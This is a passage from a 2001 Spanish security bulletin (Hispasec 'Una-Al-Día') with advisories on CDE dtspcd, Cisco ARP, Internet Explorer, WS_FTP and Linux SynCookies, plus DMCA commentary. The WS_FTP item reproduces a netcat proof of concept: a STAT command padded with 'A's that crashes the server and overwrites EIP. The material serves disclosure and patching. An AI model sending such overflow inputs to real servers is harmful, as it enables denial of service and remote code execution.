de Unix que ejecutan el sistema CDE (Common Desktop Environment). Esta
vulnerabilidad en el demonio dtspcd puede llegar a permitir a cualquier
atacante remoto la posibilidad de ejecución de código con privilegios de
super usuario en el sistema afectado.
El demonio de Subprocess Control Server no está pensado para ser
ejecutado por los usuarios normales pero es ejecutado por otros
componentes del propio sistema CDE. Este demonio acepta peticiones de
clientes para ejecutar comandos y lanzar aplicaciones de forma remota.

dtspcd se inicia por el demonio de servicios Internet inetd cuando un
cliente CDE intenta crear un proceso en el demonio del host. Este
demonio se instala habitualmente para correr en el puerto 6112/tcp con
privilegios de root.

Existe una condición de desbordamiento de búfer en la rutina de
negociación de conexión con dtpscd. El atacante remoto puede generar una
petición del cliente CDE especialmente creada para explotar la
vulnerabilidad y ejecutar código arbitrario en el sistema objetivo con
permisos de super usuario.

El demonio Subprocess Control Server está activado por defecto en todos
los sistemas operativos con CDE instalado. Además este proceso se
ejecuta por el usuario root y acepta conexiones remotas por defecto.

Como medida general y hasta la publicación o aplicación de los parches
se recomienda limitar o bloquear el acceso al Subprocess Control Service
desde redes no confiables como Internet. Mediante el uso de un firewall
o cualquier otra tecnología de filtrado de paquetes se bloqueará o
restringirá el acceso al puerto empleado por el demonio, que
habitualmente se configura para escuchar el puerto 6112/tcp.

Sun ha reconocido que el demonio dtspcd es vulnerable a este
desbordamiento de búfer y está trabajando en el desarrollo de los
parches para las versiones afectadas de Solaris.

En los sistemas TRU64 Compaq anuncia la imposibilidad de reproducir el
problema, sin embargo publicará próximamente una actualización para
reducir la posibilidad de cualquier vulnerabilidad de desbordamiento de
búfer.

Para Sistemas HP-UX Hewlett-Packard reconoce la existencia de la
vulnerabilidad y anuncia el desarrollo de parches para evitar el
problema. Hasta la publicación y disponibilidad de dichos parches HP
proporciona un archivo dtspcd para reemplazarlo en los sistemas
afectados y evitar la vulnerabilidad.

Se deberá descargar el archivo dtspcd.tar.gz del sitio ftp:
hprc.external.hp.com (192.170.19.51).
Este archivo se publica de forma temporal y deberá ser eliminado cuando
los parches finales estén disponibles por HP.

Dirección ftp: hprc.external.hp.com (192.170.19.51).
usuario: dtspcd
password: dtspcd
archivo: dtspcd.tar.gz

Se podrá instalar el nuevo dtspcd mediante el script install_dtscpd
incluido en el paquete descargado.



Antonio Ropero
antonior@hispasec.com


Más información:

CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control
Service
http://www.cert.org/advisories/CA-2001-31.html

Multi-vendor CDE dtspcd daemon buffer overflow
http://xforce.iss.net/static/7396.php

Internet Security Systems Security Advisory #101,
Multi-Vendor Buffer Overflow Vulnerability in CDE Subprocess Control
Service
http://xforce.iss.net/alerts/advise101.php

Caldera International, Inc. Security Advisory CSSA-2001-SCO.30
http://www.securityfocus.com/advisories/3645

CERT Vulnerability Note VU#172583
Common Desktop Environment (CDE) Subprocess Control Service dtspcd
contains buffer overflow
http://www.kb.cert.org/vuls/id/172583

Hewlett-Packard Security Bulletin #00175
http://www.securityfocus.com/advisories/3651



viernes, 16 de noviembre de 2001

Vulnerabilidad de sobrescritura de la tabla ARP en Cisco IOS

Es posible enviar un paquete ARP (Address Resolution Protocol) sobre un
interfaz local como ethernet, cable, tokenring o fddi que provoque que
un router o un switch con versiones específicas de Cisco IOS o CatOS
detenga el envío y recepción de paquetes ARP en el interfaz
local.
Este problema provocará en un periodo corto de tiempo que el router y
los hosts locales sean incapaces de enviarse paquetes entre sí. Los
paquetes ARP recibidos por el router para el propio interfaz del router
pero con diferente dirección MAC(Media Access Control) sobreescribirán
la dirección MAC del router en la tabla ARP con la recibida en el paquete
ARP.

Este ataque sólo se puede llevar a cabo con éxito contra dispositivos
situados en el segmento local. Si se llega a realizar este ataque con
éxito el atacante conseguirá una denegación de servicio sobre el
dispositivo afectado, ya que el router dejará de rutar los paquetes de
forma correcta.

Debido al gran número de versiones de Cisco IOS que se ven afectadas y
la diversidad de actualizaciones se recomienda consultar la tabla
existente en
http://www.cisco.com/warp/public/707/IOS-arp-overwrite-vuln-pub.shtml
O acudir al distribuidor habitual para obtener la actualización
correspondiente.



Antonio Ropero
antonior@hispasec.com


Más información:

Cisco IOS ARP Table Overwrite Vulnerability
http://www.cisco.com/warp/public/707/IOS-arp-overwrite-vuln-pub.shtml



jueves, 15 de noviembre de 2001

Importante parche para Internet Explorer

Microsoft ha publicado un parche para cubrir la vulnerabilidad
anunciada recientemente sobre el acceso remoto a las cookies
almacenadas en los discos duros de los usuarios. Este parche
además cubre tres nuevas vulnerabilidades y todas las vulnerabilidades
conocidas para Internet Explorer 5.5 SP2 e Internet Explorer 6.
El pasado día 12 de noviembre informábamos de una vulnerabilidad
existente en los navegadores de Microsoft Internet Explorer 5.5 e
Internet Explorer 6.0. Esta vulnerabilidad permitía el acceso remoto a
las cookies grabadas en el disco duro de los usuarios, con posibilidad
de leer o modificar su contenido.

En su momento Microsoft no había publicado el parche para eliminar esta
vulnerabilidad sin embargo se recomendaban una serie de contramedidas
para evitar cualquier problema. En la actualidad Microsoft anuncia la
publicación del parche necesario para eliminar esta vulnerabilidad.
Este nuevo parche puede calificarse de interés ya que no sólo resuelve
el problema de las cookies sino que elimina todas las vulnerabilidades
conocidas para Internet Explorer 5.5 SP2 e Internet Explorer 6.

Además de suprimir todas las vulnerabilidades que afectan a IE 5.5
Service Pack 2 e IE 6, el parche también elimina tres nuevas
vulnerabilidades. Las dos primeras hacen relación a la forma en que IE
maneja las cookies entre dominios y se basan en problemas similares a la
primera vulnerabilidad original, ya que mediante el uso de una URL
especialmente creada un usuario malicioso podrá conseguir acceso a las
cookies de los usuarios.

La ultima de las nuevas vulnerabilidades cubiertas sólo afecta a
Internet Explorer 6 y es una nueva variante de la anunciada el 11 de
octubre y que hace relación a la forma en que Internet Explorer trata
las direcciones IP construidas sin los puntos, por ejemplo
http://031713501415 en vez de http://207.46.131.13. Este tipo de
direcciones recibe el nombre de direcciones de 32 bits. El problema
viene dado, porque Explorer no reconoce que la dirección es un sitio
de Internet y trata de abrirlo con la configuración de seguridad de
la Zona Intranet. Es decir, con menores restricciones de seguridad.
Esta actualización puede descargarse de la dirección:

http://www.microsoft.com/windows/ie/downloads/critical/q312461/default.asp



Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de seguridad Microsoft MS01-055: Cumulative Patch for IE
http://www.microsoft.com/technet/security/bulletin/ms01-055.asp



miércoles, 14 de noviembre de 2001

Legislación norteamericana contra los análisis de seguridad

Recientemente, EE.UU. ha aprobado una serie de leyes encaminadas a
declarar ilegales la publicación de estudios y análisis que demuestren
vulnerabilidades en sistemas hardware o software.
Las leyes, englobadas bajo el nombre común de DMCA (Digital Millennium
Copyright Act), pretender defender las industrias de contenidos (audio,
texto y vídeo) frente a la piratería, pero sus implicaciones son muy
amplias y peligrosas.

La DMCA convierte en ilegal la distribución de "circumvention
technology" (tecnología para burlar protecciones). Entendido en un
sentido amplio, algo que ya se está aplicando en EE.UU., un documento
científico describiendo una vulnerabilidad en una tecnología entraría
dentro de esta categoría y, por lo tanto, sería ilegal en los Estados
Unidos.

Publicar casi cualquier trabajo sobre seguridad, entonces, sería un acto
delictivo en ese país.

A este respecto me gustaría exponer una serie de conclusiones, a título
personal:

* Aunque publicar información sobre vulnerabilidades sea ilegal, la
información seguirá circulando libremente por el mundo "underground",
donde el anonimato es ley. En cambio, los administradores de sistemas y
responsables de seguridad, siendo personas legales, no tendrán acceso a
esa información, que sí tendrán sus atacantes.

* El progreso técnico y científico se basa en el libre flujo de
información y en estudios independientes. Esto es especialmente cierto
en el campo de la criptología. Si los problemas de diseño o
implementación de un sistema criptográfico no se pudiesen hacer públicos
de forma legal, los usuarios tendrán sistemas débiles e inseguros.

Ya existen casos demostrables en los que una tecnología criptográfica,
una vez expuesta a expertos independientes, se ha demostrado insegura:
el cifrado GSM, la protección anticopia de los DVDs, el cifrado WEP de
las redes inalámbricas 802.11... Si dichas tecnologías se hubiesen hecho
públicas, el descubrimiento de sus vulnerabilidades se habría efectuado
antes de llegar al mercado.

¿Qué hubiera ocurrido si la publicación de las vulnerabilidades fuese
ilegal?. La vulnerabilidad seguiría existiendo, por supuesto, y sería
conocida dentro de determinados círculos. El público, no obstante,
pensaría que está utilizando tecnología segura y de calidad, estando a
merced de tiburones sin escrúpulos.

Adicionalmente, sin la publicidad de las vulnerabilidades, las empresas
no tendrían ningún aliciente para seguir innovando y dotar a los
sistemas, aunque sea tras infinidad de intentos fallidos, de verdadera
seguridad a toda prueba.

Los primeros resultados negativos ya se han empezado a ver:

* La versión 2.2.20 del kernel Linux, de reciente aparición, indica
expresamente en su fichero de "cambios" que se han solucionado varios
problemas de seguridad, pero que no se proporcionan detalles para no
violar la DMCA.

* Un ciudadano ruso, de nombre Dmitri Sklyarov, está pendiente de juicio
en EE.UU., al ser coautor de un programa utilizado para descifrar
ficheros PDF. El programa, elaborado y distribuido por una firma rusa,
se vende desde ese país. Dimitri está acusado de contravenir la DMCA,
aunque sea ciudadano extranjero y los actos de los que se le acusa se
realizasen fuera de los EE.UU.. Dimitri fue detenido por el FBI, tras
una denuncia de Adobe, al término de una jornadas de seguridad
desarrolladas en los Estados Unidos, a donde había viajado desde su país
natal. El trabajo de Sklyarov es perfectamente legal en Rusia y en la
mayoría de los países occidentales.

Si tienes más de un hijo, ¿puedes ir de vacaciones a China sin peligro
de ser encarcelado, al haber violado una ley local de ese país, mientras
estabas en el exterior y siendo ciudadano foráneo?. Probablemente en
China sí, pero no en los Estados Unidos, si se ven los precedentes.

* El profesor Edward Felten, de la universidad de Princeton, decidió no
publicar los fallos de seguridad que había descubierto en el reto SDMI
(Secure Digital Music Initiative), con los que probaba que era posible
eliminar las "marcas de agua" insertadas en una canción, destruyendo el
sistema anticopia puesto a prueba por la SDMI. A pesar de que el
objetivo del reto era demostrar si los sistemas propuestos eran seguros,
algo que Felten echó por tierra, publicar sus resultados sería ilegal.
En ese sentido, la industria discográfica seguía intentando aprobar un
esquema de protección musical demostradamente fallido, aunque las
pruebas de ello no fuesen públicas, y el autor de las mismas tuviese que
afrontar denuncias judiciales.

* Recientemente Niels Ferguson, criptógrafo holandés de reconocido
prestigio internacional, afirmó haber descubierto una vulnerabilidad en
el esquema de protección HDCP de Intel. HDCP es un sistema de cifrado
para el bus DVI, donde se conectan televisores, cámaras, reproductores
de DVD y similares. Según Ferguson, se puede obtener la clave maestra
del sistema en menos de dos semanas. Una vez obtenida dicha clave, se
pueden copiar o crear contenidos sin restricción, crear dispositivos
nuevos, etc.

Aunque Ferguson no publicó los detalles (aunque es holandés, podría ser
detenido en cualquiera de sus viajes a EE.UU.), poco después se
desvelaron todas las interioridades de forma abierta, a través de otra
vía: Scott A. Crosby, de la universidad Carnegie Mellon. Estudiándolas
detenidamente, se puede observar que la seguridad del sistema HDCP es
trivial.

Como se cita a Ferguson en el semanario Ciberpaís: "Si no investigamos,
nunca desarrollaremos buenos esquemas de protección anticopia. La DMCA
protege al fabricante de un mal producto en el sentido de que es ilegal
demostrar que es defectuoso". De hecho la DMCA contraviene sus propios
intereses, ya que sin poder investigar sistemas anticopia avanzados es
imposible desarrollar esquemas seguros.

El problema de la DMCA no son tanto sus objetivos sino los medios que
aborda para ello. La discusión de vulnerabilidades o la posesión de
sistemas capaces de saltarse protecciones no debe ser algo ilegal,
sencillamente porque existen multitud de usos legales para esa
tecnología e información.

Los cerrajeros, por ejemplo, necesitan disponer de sus herramientas de
forma legal. Las empresas de recuperación de datos necesitan
herramientas de escaneo de discos duros a bajo nivel para poder hacer su
trabajo.

Las herramientas y los conocimientos no deberían ser ilegales si tienen
usos beneficiosos. Lo que debe ser ilegal, y ya lo es en la mayor parte
de los países, es la copia, venta y distribución no autorizada de
material protegido con "copyright". Esa legislación ya existe y se
utiliza constantemente desde hace decenios. La DMCA, en su estado
actual, no tiene ningún sentido.

Prohibir difundir un documento porque su temática no nos es grata es
algo prohibido (salvo casos excepcionales) en la mayor parte del mundo
"civilizado", tratándose de un derecho garantizado con leyes que
promueven la libertad de expresión y la libertad de prensa. Es triste
comprobar como el país del mundo que se vanagloria de mayor libertad
tira por tierra su "Primera Enmienda" constitucional con una ley que ni
siquiera cumple sus objetivos declarados.

El reciente fallo judicial catalogando el código "DeCSS" como protegido
por la libertad de expresión, hecho del que nos hicimos eco en Hispasec
esta misma semana, abre una brecha legal para atacar la DMCA. Cuando el
juicio de Dmitri Sklyarov empiece (Dmitri está actualmente en libertad
provisional y tiene prohibido abandonar EE.UU., aunque es ruso y reside
en Rusia) no sería sorprendente que la DMCA fuese declarada
anticonstitucional.

Mientras tanto, seguiré teniendo mucho cuidado con lo que digo, aunque
sea español y no tenga pensado viajar a EE.UU. en un futuro próximo...

Recomiendo a todos los lectores de "Una-Al-Día" que echen un detenido
vistazo a los enlaces que siguen.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Electronic Frontier Foundation
http://www.eff.org/

Linux security self-censorship ominous
http://www.newsforge.com/article.pl?sid=01/11/08/0125207

Linux security self-censorship ominous
http://www.theregister.co.uk/content/4/22712.html

The Case For Full Disclosure In The Linux Changelog
http://slashdot.org/article.pl?sid=01/11/11/1424212

Keep Security Censorship Away From Linux
http://www.securityfocus.com/columnists/35

Linux Update withholds Security Details
http://www.securityfocus.com/news/274

Security in an Open Electronic Society
http://www.securityfocus.com/news/270

Welcome to the Anti-DMCA Website
http://www.anti-dmca.org/

Apparent HDCP authentication protocol weaknesses
http://cryptome.org/hdcp-weakness.htm

Video crypto standard cracked?
http://www.securityfocus.com/news/236

Un criptólogo rompe la protección anticopia del sistema de vídeo de
Intel
http://www.ciberpais.elpais.es/d/20010823/cibersoc/soc4.htm

Dutch Cryptographer Cries Foul
http://www.wired.com/news/politics/0,1283,46091,00.html

Niels Ferguson's home page
http://www.macfergus.com/niels/

Censorship in action: Silenced by the DMCA
http://www.macfergus.com/niels/dmca/index.html

Los problemas para la ciencia de las leyes contra la rotura de
protecciones
http://barrapunto.com/article.pl?sid=01/09/23/1637253&mode=thread&threshold=

Anticircumvention Rules: Threat to Science
http://www.sciencemag.org/cgi/content/full/293/5537/2028

RIAA/SDMI Letter, April 9, 2001
http://www.cs.princeton.edu/sip/sdmi/riaaletter.html



martes, 13 de noviembre de 2001

¿Seguridad con Microsoft?

En menos de un mes Microsoft ha tenido que retirar en dos ocasiones
sendos parches que debían solucionar problemas de seguridad. En su
lugar las actualizaciones causaban errores a nivel de sistema y
paradas en algunos servicios. Peor el remedio que la enfermedad.
El pasado 18 de octubre Microsoft retiraba un parche para Windows 2000
(MS01-052 Invalid RDP Data can Cause Terminal Service Failure) cuya
instalación causaba errores en los sistemas. El 22 de octubre se
publicaba una rectificación del parche. Steve Lipner, director de
seguridad de Microsoft, reconoció públicamente los problemas que
achacó a "confusiones" de índole administrativa, al mismo tiempo que
anunciaba la puesta en marcha de nuevos procedimientos para impedir se
volviera a repetir el caso y conseguir la confianza de los usuarios.

Dicho y hecho. El 1 de noviembre Microsoft publicaba un boletín
donde se describía y facilitaba un parche destinado a corregir una
vulnerabilidad en el servicio UPnP (Universal Plug and Play) que
afecta a Windows 98, ME y XP. Los usuarios de Windows ME que
instalaron el parche pasaron de la remota posibilidad de sufrir un
ataque DoS a poder tener continuos problemas a nivel de sistema.
Tras los primeros reportes Microsoft retiró el parche para
Windows ME, a día de hoy siguen investigando el problema.

Peor lo llevan aquellos usuarios que hacen uso de las actualizaciones
automáticas de Microsoft, "Windows Update", que suelen ser los
"conejillos de India" donde se prueban los parches sin más
información. Bajo el título "October 25th, 2001 Critical Update"
se incluyó el parche defectuoso del servicio UPnP.

En pleno debate sobre la "anarquía informativa", Microsoft deja
patente que sus problemas con la seguridad, al menos en lo que a los
parches defectuosos se refieren, poco tiene que ver con la presión que
pueda ejercer la divulgación pública de las vulnerabilidades
detectadas en sus productos.

El problema original en el servicio UPnP fue reportado en exclusiva a
Microsoft el 15 de agosto por un investigador externo. Tuvo que
esperar 12 días a que Microsoft le comunicara que estaban estudiando
el caso. A principios de septiembre le confirmaron la existencia de la
vulnerabilidad. Transcurridas 10 semanas del aviso, el 1 de noviembre,
Microsoft hace pública la vulnerabilidad y facilita la "solución" con
los problemas ya descritos.

Al término de esta nota he recibido un mensaje desde Chile donde
"ZeroX" me comenta los problemas que ha encontrado en la herramienta
"HFNetChk" de Microsoft destinada a detectar los parches que faltan
en un sistema. En resumen, la falta de actualización de esta utilidad
ocasiona informes erróneos que pueden causar una falsa sensación de
seguridad. En lo que parece una clara contradicción a las tan
difundidas "Nuevas Estrategias de Seguridad", "ZeroX" dejaba caer la
siguiente pregunta: ¿Microsoft está realmente comprometida con la
seguridad?



Bernardo Quintero
bernardo@hispasec.com


Más información:

¿Anarquía informativa?
http://www.hispasec.com/unaaldia.asp?id=1091

Microsoft Security Bulletin MS01-052
Invalid RDP Data can Cause Terminal Service Failure
http://www.microsoft.com/technet/security/bulletin/MS01-052.asp

Microsoft Security Bulletin MS01-054
Invalid Universal Plug and Play Request can Disrupt System Operation
http://www.microsoft.com/technet/security/bulletin/MS01-054.asp

Three Windows XP UPNP DOS attacks
http://www.securityfocus.com/archive/1/224295

Problems with MS01-052 - Microsoft responds
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0111&L=ntbugtraq&F=P&S=&P=7939

Microsoft To Review Buggy Patch Procedures
http://www.newsbytes.com/news/01/172041.html



lunes, 12 de noviembre de 2001

Se autoriza la publicación del código "DeCSS"

Un juzgado californiano decide que la publicación del código "DeCSS"
está cubierta por la Primera Enmienda norteamericana y, por lo tanto,
prohibir su publicación en los Estados Unidos es anticonstitucional.
Como muchos de nuestros lectores recordarán, ya que hemos publicado
varios boletines al respecto, "DeCSS" es un pequeño programa que permite
descifrar una película DVD. Se desarrolló con el fin de crear un
reproductor DVD gratuito bajo el sistema operativo Linux, pero la
industria cinematográfica lo consideró como una herramienta diseñada
para saltarse el "copyright" de las películas y denunció a su autor, un
joven noruego de 15 años, Jon Johansen.

La decisión judicial equipara el código fuente informático con un
"lenguaje para la transmisión de ideas y conocimientos", como puede
serlo el español o el inglés y, por tanto, está protegida por la Primera
Enmienda norteamericana, que vela por la libertad de expresión.

En las conclusiones, la sala escribe, dirigiéndose a la industria
cinematográfica: "el derecho a proteger su secreto comercial no es un
interés 'más fundamental' que el derecho a la libertad de expresión
reconocido por la Primera Enmienda". De hecho, se describen precedentes
similares en donde la parte querellante fue el propio gobierno
norteamericano, no logrando sus propósitos restrictivos.

Todavía es pronto para evaluar las implicaciones de esta decisión
judicial en todas sus vertientes. Personalmente estoy sobre ascuas
esperando su impacto en la reciente legislación norteamericana que
prohibe la publicación de documentos detallando problemas de seguridad.
Más sobre esto en un próximo boletín.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Un tribunal californiano permite la publicación del código de
decodificación de DVD
http://www.idg.es/pcworld/noticia.asp?idn=19433

Movie industry dealt DVD-cracking blow
http://dailynews.yahoo.com/h/cn/20011102/tc/movie_industry_dealt_dvd-cracking_blow_1.html

Is code free speech?
http://arstechnica.com/wankerdesk/2q99/freespeech-1.html

DeCSS: la odisea continua
http://www.argo.es/~jcea/artic/hispasec146.htm

Comunicado de la GILC sobre la demanda de la DVD Copy Control
http://www.argo.es/~jcea/artic/hispasec38.htm

Cae la protección criptográfica de los DVDs
http://www.argo.es/~jcea/artic/hispasec25.htm

Seven lines of code can crack DVD encryption
http://asia.cnn.com/2001/TECH/internet/03/12/DVD.code.idg/index.html

The littlest DVD descrambler
http://www.securityfocus.com/news/172



domingo, 11 de noviembre de 2001

Posibilidad de acceso remoto a datos de las cookies

Microsoft ha informado de una vulnerabilidad existente en Internet
Explorer 5.5 y 6.0 por el cual un atacante remoto puede tener acceso,
con posibilidad de lectura y modificación, a las cookies almacenadas
en los ordenadores de los usuarios.
Los sitios web emplean cookies como una forma de almacenar información
en el ordenador del propio usuario. Generalmente la información
almacenada se emplea para adaptar y retener la configuración del sitio
al gusto del usuario para posteriores sesiones. Por diseño cada sitio
debe mantener sus propias cookies en la máquina del usuario y sólo debe
acceder a dichas cookies.

Pero se ha detectado una vulnerabilidad por la cual una URL
especialmente creada y modificada puede acceder sin autorización a todas
las cookies del usuario e incluso modificar su contenido. Debido a que
algunas páginas web almacenan información sensible en las cookies del
usuario, es perfectamente posible que dicha información quede expuesta.

Microsoft está preparando un parche para cubrir este problema, pero
hasta la publicación de dicha actualización los usuarios pueden proteger
sus sistemas mediante la inhabilitación de javascript (Active
scripting).

El problema puede ser explotado a través de una página web o desde un
e-mail html que contenga la URL específicamente construida. Para que el
problema no pueda reproducirse desde un e-mail html se recomienda
aplicar la actualización de seguridad para Outlook (Outlook Email
Security Update). También puede protegerse mediante la configuración de
Outlook para el uso de la Zona de Seguridad "Restricted Sites Zone" (en
Opciones/Seguridad).



Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de seguridad de Microsoft MS01-055:
Cookie Data in IE Can Be Exposed or Altered Through Script Injection:
http://www.microsoft.com/technet/security/bulletin/ms01-055.asp



sábado, 10 de noviembre de 2001

Importante problema con iTunes 2 para el Mac OS X de Apple

Un error en la programación del instalador de iTunes 2, borra la
información en discos duros de los usuarios de Apple.
El pasado día 2 de Noviembre la multinacional de la manzana comenzó a
distribuir iTunes 2, programa reproductor de MP3s y grabación de CDs.
Esto que hubiera sido algo normal se vio emborronado, ya que la nueva
versión de iTunes estaba afectada por un error en la programación,
con el resultado de un borrado completo en los discos duros de los
usuarios afectados.

Este resultado tan catastrófico para los usuarios, es debido al error
por parte del equipo de programadores que añadieron una coma "," al
final de una línea del instalador "iTunes.pkg". Este aparente
insignificante error, cambio la orden "borrar todos los archivos de
la versión anterior de iTunes, por borrar todos los archivos.

Apple ha reconocido el error y publicado una versión libre de fallos.
Dentro de este mismo contexto la compañía intentó minimizar el
problema explicando que esta "incidencia" sólo afecta a determinadas
configuraciones que tuvieran particiones en sus discos duros y que a
su vez tuvieran un espacio en blanco al comienzo del nombre.

Corre una serie de rumores aún sin confirmar, que afirman que Apple
está dando la opción a los usuarios afectados de la recuperación de
los datos perdidos a través de una empresa especializada al respecto.
Esto hace que nos planteemos la idea de que o bien el problema no ha
tenido la repercusión que en un principio se pensó o que Apple está
realizando una importante campaña de recuperación de imagen tras este
incidente.

De paso nos permitimos la recomendación a los usuarios que descargaron
la versión afectada de iTunes 2 y que aún no la hayan instalado que
borren el fichero "itunes.pkg" y que posteriormente procedan a bajarse
la nueva versión de la web de Apple en la dirección:

http://www.apple.com/itunes/download/



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Apple has identified an installer issue with iTunes 2.0 for Mac OS X
http://www.apple.com/itunes/alert/

MacSlach
http://www.macslash.com

Apple Reportedly Offering Data Recovery For iTunes 2 Victims
http://www.macslash.com/articles/01/11/07/024239.shtml

La importancia de quitar una coma
http://www.elmundo.es/navegante/2001/11/07/esociedad/1005121852.html



viernes, 9 de noviembre de 2001

Vulnerabilidad en WS_FTP Server v.2.03 y anteriores

Un atacante puede realizar una petición malintencionada a WS_FTP
Server para conseguir un desbordamiento de buffer.
WS_FTP Server es un servidor FTP que por defecto corre como un
servicio del sistema. Este popular servidor FTP se ejecuta bajo
plataformas Microsoft Windows. El problema en cuestión viene dado
cuando un atacante, previa autenticación, realiza una petición
especialmente malformada mediante comandos FTP. El atacante
procederá a realizar una petición tipo "STAT" seguida de una cadena
de caracteres de aproximadamente 479 bytes, con lo que conseguirá un
ataque DoS sobre el servidor. Si el atacante quisiera pulir aún más
su asalto podría intentar sobrescribir las variables de pila y la
dirección de retorno con lo que podría ejecutar código a nivel
del sistema.

Ejemplo proporcionado por Defcom Labs:


C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
(A1)
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???

Para solucionar este problema se deberá actualizar a la versión WS_FTP
Server 2.0.4., es requisito previo a esta actualización, que el
servidor corra sobre una versión 2.x.

ftp://ftp.ipswitch.com/Ipswitch/Product_Support/WS_FTP_Server/ifs204.exe



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Ipswitch WS_FTP Server 2.0.3 Buffer Overflow
http://labs.defcom.com/adv/2001/def-2001-31.txt

Upgrade to WS_FTP Server 2.04 from 2.x.
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html



jueves, 8 de noviembre de 2001

Problemas en Internet Explorer 5.1 sobre Mac

Los sistemas Operativos Macintosh OS X, que utilizan Internet Explorer
5.1 se ven afectados por una vulnerabilidad por la cual un usuario
malicioso puede llegar a ejecutar código en la máquina atacada.
La vulnerabilidad viene dada por la ejecución automática de archivos
comprimidos tipo BinHex y MacBinary realizada por Internet Explorer. Una
vez realizada la descarga desde el sitio web del atacante los archivos
procederán a ejecutarse automáticamente, con la posibilidad de contener
código malicioso con el consiguiente riesgo para los Mac OS X.

Con el fin de solucionar este problema Microsoft publica el
correspondiente parche, que deberá ser descargado mediante la utilidad
de actualización v10.1 incluida en los Mac OS X desde la dirección:

http://www.apple.com/macosx/upgrade/softwareupdates.html



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Downloaded Applications Can Execute on Mac IE 5.1 for OS X:
http://www.microsoft.com/technet/security/bulletin/MS01-053.asp



miércoles, 7 de noviembre de 2001

Vulnerabilidad "SynCookie" y cortafuegos, bajo Linux

Linux, con la opción de "SynCookie" activada, es susceptible a un ataque
que permite a un atacante remoto el conectarse a un puerto TCP/IP
protegido con los cortafuengos Linux nativos, si se dan una serie de
circunstancias y el atacante invierte los suficientes recursos.
"SynCookie" es un mecanismo que inmuniza una máquina Linux ante ataques
de denegación de servicio del tipo "Syn Flood" que, básicamente,
consiste en solicitar conexiones TCP/IP desde remitentes espúreos,
falseando la dirección IP de origen ("IP Spoof"). Dado que el protocolo
TCP/IP requiere un establecimiento de conexión negociado en tres pasos,
si la IP origen no responde, la conexión no llega a completarse del
todo.

En un sistema operativo no protegido, el número de sesiones a medio
abrir es un valor muy bajo (por ejemplo 10-30), y cualquier intento de
conexión legítima subsiguiente será ignorado. Las sesiones a medio abrir
acaban por expirar, pero su número es tan bajo y su expiración tan alta
(minutos) que basta con que un atacante envíe unos pocos datagramas por
minuto para bloquear un servicio por completo, constituyendo un ataque
DoS (denegación de servicio) muy efectivo.

Ante este tipo de ataques, populares hace unos años y cuya fuente es muy
difícil de localizar, los sistemas operativos modernos han desarrollado
dos tipos de estrategia:

a. Algunos no imponen otros límites al número de sesiones semiabiertas
más que la cantidad de memoria del sistema (lo que de por sí ya puede
constituir un DoS en sí mismo). Si, por ejemplo, una conexión nos ocupa
512 bytes y tenemos 128 Megabytes de RAM para gastar en la tarea,
tendremos capacidad para 262144 sesiones simultaneas. Si expiramos las
sesiones no abiertas en dos minutos (valor típico), nos tienen que
llegar al menos casi 2200 peticiones de conexión nuevas por segundo para
bloquear el servicio. 2200 peticiones de conexión por segundo ocupan al
menos 700Kbps de ancho de banda, recurso no disponible para la mayoría
de los atacantes y que puede contrarrestarse reduciendo el tiempo de
vida de las sesiones a medio abrir o aumentando la cantidad de memoria
libre para gastar en esta protección.

b. Otros sistemas operativos, además del punto anterior, siguen la
filosofía de no reservar memoria para una sesión hasta que se ha
completado la conexión al 100%. Para ello utilizan técnicas
criptográficas reto-respuesta que aseguran que un atacante malicioso no
pueda utilizar IPs remitentes falsificadas.

En Linux, el reto criptográfico emplea 24 bits, lo que supone que, de
media, un atacante debe enviar unos ocho millones de datagramas para
poder conseguir que uno solo de ellos se considere creador de una
conexión válida. El resto se ignoran.

Aunque ocho millones de datagramas es muy poco en términos de
resistencia criptográfica, si pensamos que el ataque debe realizarse a
través de una red de datos, lo convierte en poco probable en la
práctica.

En el caso de Linux un atacante con suficiente recursos sólo conseguirá
que el Kernel acepte una conexión de cada ocho millones (en media) que
esté intentando.

Aunque tan minúscula proporción no sea muy atractiva como ataque DoS, sí
supone un grave riesgo de seguridad si estamos utilizando reglas de
cortafuegos que verifiquen el flag "Syn", ya que la conexión atravesaría
la regla del cortafuegos y se establecería. Una vez establecida, un
atacante podría enviar o recibir datos a través de la misma sin
interferencia del cortafuegos.

Una posible solución es deshabilitar el uso de "SynCookies" mediante el
